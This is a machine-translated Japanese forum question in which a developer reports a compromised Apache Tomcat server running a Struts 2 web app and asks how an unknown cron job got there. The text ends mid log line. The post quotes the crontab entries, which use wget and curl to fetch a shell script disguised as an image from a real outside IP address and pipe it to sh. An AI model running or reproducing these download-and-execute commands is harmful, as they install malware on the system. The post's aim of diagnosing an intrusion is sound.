3
不明な起源のcronを介したApacheサーバーへのシェルスクリプト攻撃
Apache tomcatサーバーでプロジェクト戦争を実行しているときに、サーバーが危険にさらされていることがわかりました。 未知の世界で戦争をしている間、cronこんな風に走っています [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh ダウンロードは、logo.jpgマルウェアをダウンロードされたシェルスクリプトを持っています。 以下のこのウェブサイトで同様の問題を見つけました https://xn--blgg-hra.no/2017/04/covert-channels-hiding-shell-scripts-in-png-files/ そして /security/160068/kworker34-malware-on-linux 私のコード全体でこのcronスケジューラの起源を見つけることができません。 誰かがこの問題に直面していることを知りたいのですか?コードでスケジューラの起源を見つけるにはどうすればよいですか。 注意: JAVA(Struts 2)+ jsp + javascript + jquery Webプロジェクトに取り組んでいます。 このスケジューラは、プロジェクトのwarファイルでTomcatを起動するたびに実行されますが、コード内にスケジューラのスケジューラを見つけることができません。 ログファイルで次の行を見つけました [INFO] 2017-06-02 17:00:41,564 org.apache.struts2.dispatcher.Dispatcher info - …